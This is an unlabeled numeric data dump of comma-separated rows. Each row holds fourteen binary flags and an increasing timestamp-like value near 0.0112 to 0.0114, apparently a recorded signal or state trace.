1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1217020e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1217044e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1217068e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1217092e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1217116e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1217140e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1217168e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1217192e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1217196e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1217244e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1217268e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1217276e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1217292e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1217316e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1217340e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1217368e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1217392e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1217420e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1217468e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1217492e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1217500e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1217544e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1217568e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1217572e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1217592e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1217620e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1217644e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1217668e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1217692e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1217716e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1217724e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1217768e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1217792e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1217820e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1217844e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1217848e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1217892e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1217916e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1217924e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1217940e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1217968e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1217992e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1218020e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1218068e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1218092e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1218100e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1218116e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1218140e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1218148e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1218168e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1218192e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1218220e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1218244e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1218268e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1218292e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1218316e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1218340e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1218396e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,1.1218420e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1218424e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1218468e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1218492e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1218500e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1218544e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1218568e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1218592e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1218620e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1218644e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1218668e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1218672e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1218716e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1218740e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1218748e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1218796e-02 1,0,1,0,0,0,0,0,0,1,0,0,0,0,1.1218820e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1218824e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1218844e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1218868e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1218892e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1218916e-02 1,0,1,0,0,1,0,0,0,1,0,0,1,0,1.1218940e-02 1,0,1,0,0,1,0,0,0,1,0,0,0,0,1.1218968e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1218972e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1219020e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1219044e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1219068e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1219092e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1219116e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1219140e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1219168e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1219192e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1219220e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1219244e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1219268e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1219292e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1219316e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1219340e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1219368e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1219392e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1219420e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1219444e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1219468e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1219492e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1219516e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1219540e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1219568e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1219592e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1219620e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1219644e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1219668e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1219692e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1219716e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1219740e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1219768e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1219796e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1219820e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1219844e-02 1,0,1,0,0,0,0,0,0,0,0,0,1,0,1.1219868e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,0,1.1219896e-02 1,0,1,0,0,0,0,0,0,0,0,0,0,1,1.1344020e-02 0,0,1,0,0,0,0,0,0,0,0,0,0,1,1.1344236e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,1.1344260e-02 0,1,1,0,0,0,0,0,0,0,0,1,0,1,1.1344288e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,1.1344316e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,1,1.1344612e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,1.1344636e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,1,1.1344660e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,1.1344688e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,1.1344692e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,1.1344712e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,1.1344740e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,1.1344760e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,1.1344788e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,1,1.1344812e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,1,1.1344836e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,1.1344844e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,1,1.1344888e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1344916e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1344940e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1344964e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1344968e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1344988e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1345012e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1345036e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1345060e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1345068e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1345088e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1345112e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1345140e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1345164e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1345188e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1345212e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1345220e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1345264e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1345288e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1345296e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1345308e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1345336e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1345340e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1345388e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1345412e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1345420e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1345436e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1345460e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1345484e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1345508e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1345536e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1345560e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1345588e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1345612e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1345636e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1345660e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1345684e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1345708e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1345736e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1345760e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1345788e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,1.1345812e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1345816e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1345836e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1345860e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1345884e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1345908e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1345936e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1345960e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.1345964e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1345968e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1346012e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1346036e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1346060e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1346084e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1346108e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1346136e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1346160e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1346188e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1346212e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1346236e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1346260e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1346284e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1346308e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1346336e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1346360e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1346388e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1346412e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1346436e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1346460e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1346484e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1346492e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1346536e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1346560e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1346568e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1346588e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1346612e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1346636e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1346660e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1346684e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1346708e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1346716e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1346764e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1346788e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.1346792e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1346796e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1346812e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1346836e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1346840e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1346884e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1346908e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1346916e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1346936e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1346960e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1346988e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1347012e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1347036e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1347060e-02 0,1,1,0,0,0,0,0,0,1,0,0,0,0,1.1347064e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1347068e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1347112e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1347136e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.1347140e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1347144e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1347160e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1347188e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1347212e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1347236e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1347240e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1347260e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1347284e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1347292e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1347336e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1347360e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1347412e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1347436e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1347460e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1347484e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1347508e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1347536e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1347540e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1347560e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1347588e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1347592e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1347612e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1347636e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1347660e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1347684e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1347708e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1347736e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1347756e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1347788e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1347812e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1347836e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1347860e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1347884e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1347908e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1347932e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1347956e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1347980e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1347988e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1348036e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1348060e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1348084e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1348108e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1348116e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1348132e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1348156e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1348180e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1348208e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1348232e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1348260e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1348308e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1348332e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1348340e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1348356e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1348380e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1348408e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1348432e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1348460e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1348484e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1348508e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1348532e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1348540e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1348584e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1348608e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.1348612e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1348616e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1348636e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1348660e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1348684e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1348708e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1348732e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1348756e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1348780e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1348808e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1348832e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1348860e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1348884e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1348908e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1348912e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1348956e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1348984e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.1348988e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1348992e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1349008e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1349032e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1349060e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1349084e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1349108e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1349132e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1349140e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1349184e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1349208e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1349232e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1349260e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.1349264e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1349268e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1349284e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1349308e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1349332e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1349356e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1349380e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1349408e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1349412e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1349460e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1349484e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1349492e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1349508e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1349532e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1349540e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1349584e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1349608e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.1349612e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1349616e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1349660e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1349684e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1349732e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1349756e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1349764e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1349784e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1349808e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.1349812e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1349816e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1349832e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1349860e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1349884e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1349908e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1349932e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1349956e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1349980e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1350008e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1350032e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1350060e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1350084e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1350108e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1350132e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1350156e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1350180e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1350208e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.1350212e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1350216e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1350260e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1350284e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1350308e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1350332e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1350340e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1350384e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1350408e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1350436e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1350460e-02 0,1,1,0,0,1,0,0,0,0,0,0,0,0,1.1350464e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1350468e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1350484e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1350508e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1350532e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1350556e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1350580e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1350608e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1350612e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,1.1350660e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,1.1350684e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1350692e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1350708e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1350732e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1350756e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1350780e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,1.1350808e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,1.1350832e-02 